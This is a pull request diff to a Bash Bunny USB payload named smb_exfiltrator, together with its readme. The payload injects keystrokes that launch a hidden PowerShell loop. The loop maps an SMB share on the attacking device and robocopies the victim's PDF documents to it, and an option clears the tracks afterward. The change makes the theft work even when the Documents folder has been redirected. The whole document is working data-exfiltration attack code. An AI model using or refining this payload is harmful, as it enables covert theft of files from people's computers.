### PR TITLE
Mod to work with redirected documents folders

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -19,7 +19,7 @@
 #
 # OPTIONS
 LOOTDIR=/root/udisk/loot/smb_exfiltrator
-EXFILTRATE_FILES="*.pdf"
+EF="*.pdf" #File extension to loot, multiple extensions can be used by seperating extensions with spaces
 CLEARTRACKS="yes" # yes or no
 
 # Initialization
@@ -40,7 +40,7 @@ LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e g /USER:g; robocopy ([environment]::getfolderpath('mydocuments')) \\\172.16.64.1\e $EF /S; exit } }\""
 QUACK ENTER
 
 # Clear tracks?

--- a/payloads/library/smb_exfiltrator/readme.md
+++ b/payloads/library/smb_exfiltrator/readme.md
@@ -13,7 +13,7 @@ Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfi
 
 ## Configuration
 
-Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 
+Configured to copy PDF files by default. Change EF variable to desired file extension. 
 
 ## STATUS
 


### PR DESCRIPTION
Modified the script to use _([environment]::getfolderpath('mydocuments'))_ instead of _$ENV:UserProfile\Documents_ which will get the documents path even if it has been relocated to a network share or a different drive.

two renames to save enough characters for the longer command